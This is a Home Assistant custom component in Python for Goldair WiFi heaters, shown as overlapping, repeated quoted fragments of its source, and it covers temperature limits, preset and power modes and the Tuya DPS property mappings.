target_temperature): target_temperature = int(round(target_temperature)) preset_mode =", "reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE])", "SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE =", "def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater", "\"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys =", "= 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze'", "model of the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else:", "\"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE )", "@property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property", "supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum", "= PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode =", "STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21", "_LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode", "self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def", "swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power", "json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice", "None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None:", "list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode)", "SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK", "homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate", "return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def", "the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID", "of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if", "\"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is", "self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature})", "@property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:", "def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE])", "SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize", "self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode ==", "not load correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was:", "to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return", "get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater you", "ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE:", "and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return", "ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None", "level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level:", "ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT =", "def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def should_poll(self):", "be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature)", "of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name", "HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco,", "'3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105',", "def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property", "self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def", "'2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104',", "def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return", "= { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5,", "on the model of the heater you have\"\"\" if self._device.model == \"GECO270\": return", "'4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106'", "STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\"", "== STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None", "dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self):", "@property def name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name @property", "current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC", "1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: {", "mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError(", "return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def", "HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset", "ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL:", "GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault'", "'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE", "\"\"\" Goldair WiFi Heater device. \"\"\" import logging import json from homeassistant.const import", "not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level)", "self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5,", "ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' }", "'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on'", "None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list", "import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import", "level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode ==", "keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset", "the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif", "raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if", ") from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK =", "model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID", "5, 'max': 21 } } # self._model = model # _LOGGER.info(f'Setting model to", "if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def", "'101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 =", "preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self):", "= { 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5':", "the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\"", "ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True }", "the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we", "if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self,", "dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not", "name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS", "= device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: {", "'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK:", "keys: _LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting to Comfort')", "'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT", "ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1',", "The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1", "== ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of", "return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\"", "def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not", "\"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of", "} # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4',", "the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return", "PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE])", "import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT =", "'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3',", "preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if", "= { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop':", "= HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort,", "device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS", "Heater device. \"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS,", "device): \"\"\"Initialize the heater. Args: name (str): The device's name. device (GoldairTuyaDevice): The", "temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property", "def __init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's name. device", "'104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True", "was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode)", "the correct PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\" if", "return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of", "{limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE],", "homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const", "__init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's name. device (GoldairTuyaDevice):", "(GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP =", "\"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the", "hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode):", "HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' }", "if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.')", "GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater.", "self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self):", "ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL:", "ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' +", "HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode =", "self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if", "set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise", "from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from", "PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = {", "ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE:", "dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List", "new power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid", "of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\"", "name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self):", "f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode", "list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC", "self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE)", "else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\"", "# self._model = model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get", "the polling state.\"\"\" return True @property def name(self): \"\"\"Return the name of the", "STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3':", "'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE:", "if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode)", "raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level) def update(self): self._device.refresh()", "preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature", "temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE))", "the model of the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270", "if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode from api", "'12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = {", "'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property", "correct PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\" if self._device.model", "name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit", "new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the", "Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys:", "'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level'", "dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return", "from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock'", "ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power", "\"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL])", "Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in", "target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self):", "'105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE", "STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property", "list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level", "elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self):", "int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the", "self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the", "cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min']", "def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER:", "self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode", "else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is", "return True @property def name(self): \"\"\"Return the name of the climate device.\"\"\" return", "return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if", "return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE],", "self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL,", "SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self,", "limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target", "= SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi", "current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat", "def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return", "not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return 